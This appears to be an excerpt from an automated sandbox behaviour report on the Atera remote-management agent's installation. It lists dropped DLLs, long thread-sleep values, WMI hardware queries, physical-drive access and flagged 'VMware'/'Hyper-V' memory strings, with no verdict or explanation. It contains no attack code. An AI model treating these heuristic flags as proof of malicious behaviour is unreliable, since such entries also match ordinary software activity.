Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: 692c4e.rbf (copy)
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI422F.tmp
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6160Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6360Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7776Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 4948Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 8116Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8144Thread sleep count: 8074 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -27670116110564310s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599685s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599574s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599249s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599140s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -599011s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8144Thread sleep count: 1683 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598882s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598731s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598624s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598504s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598390s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598281s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598138s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -598015s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597848s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597734s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597621s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597515s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597403s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597294s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -597075s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596960s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596852s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596745s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596627s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596513s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596404s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596296s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596187s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -596067s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595909s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595530s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595380s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595265s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595156s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -595046s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594934s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594668s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594531s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -594165s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593843s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593719s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593451s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593334s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593206s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -593077s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -592959s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 8140Thread sleep time: -592829s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 1508Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 7896Thread sleep count: 295 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe TID: 2892Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7648Thread sleep time: -22136092888451448s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7964Thread sleep count: 7369 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 7964Thread sleep count: 2294 > 30
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 1244Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -7200000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 4940Thread sleep count: 193 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 5552Thread sleep time: -7199859s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe TID: 2208Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1720Thread sleep count: 1779 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6848Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 1704Thread sleep count: 60 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6848Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3484Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 3300Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe File opened: PhysicalDrive0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\Temp\SplashtopStreamer.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe File Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7200000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 7199859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dll
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0VMware
